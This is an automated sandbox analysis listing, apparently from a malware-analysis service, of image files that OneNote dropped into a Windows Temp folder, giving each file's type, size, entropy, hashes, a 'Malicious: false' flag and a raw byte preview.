Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{70A393F4-6C80-47F6-8D7B-35CAE9121B85}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Temp\{71565DAB-4EEF-4B52-8FEC-F46BF65D4BCB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{725D6959-0D47-45CB-B266-CF3C1EC7AA0A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Temp\{73149BF2-C242-4C1D-82BA-906112068872}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
Preview:	.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..\|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..\|.\|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6.............tb.9.j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G\|.......&..0ZK1u8.H.2...Z../..P(....BA..aL\|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.\|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

C:\Users\user\AppData\Local\Temp\{739D921F-DC69-4C13-88F6-B226EEDFB734}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{74441DF7-5601-42A8-93E4-A19EF2AEA0B7}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{7462CF45-AE02-4130-A2BC-95750A19A515}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{753E3D03-4FA0-4184-9DF3-EA3FF257DA90}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{75E0C2E0-53F4-460E-A3FA-8E559DCBB71E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{75E818DC-F236-4EE8-B5AF-FE5619B2659A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{768432D7-835C-490C-AA8A-7001B4137476}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Temp\{76EDC975-FF7D-4A91-B22D-BDE979191EC2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Temp\{799911ED-0130-420C-9CCE-EB42BF7F59DA}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Temp\{79AD6AC0-320A-4251-A739-EF65BEA7CDF7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
